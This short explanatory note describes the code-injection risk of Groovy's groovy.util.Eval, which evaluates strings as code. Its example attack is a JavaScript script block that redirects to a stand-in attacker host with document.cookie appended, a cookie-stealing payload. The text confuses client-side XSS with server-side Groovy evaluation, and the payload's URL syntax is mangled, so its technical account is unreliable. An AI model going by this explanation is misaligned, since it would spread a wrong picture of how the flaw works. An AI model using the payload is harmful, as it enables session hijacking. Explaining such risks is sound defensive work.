groovy.util.Eval

Eval takes a string as Groovy code and attempts to execute that code.

For example, if the string was:

currentUser.age >= 18

Then this expression would evaluate the object currentUser.age and return true or false.

Because of this, someone could potentially exploit this dynamic evaluation of code to cause unexpected and/or undesired results.

For example, if a user was able to replace the string with:

<script>
window.location='<http://attacker/?cookie='+document.cookie>
</script>

Then the attacker is able to arbitrarily execute this code and potentially steal a cookie. Then they can impersonate the user they stole the cookie from and steal or cause harm to a user’s account.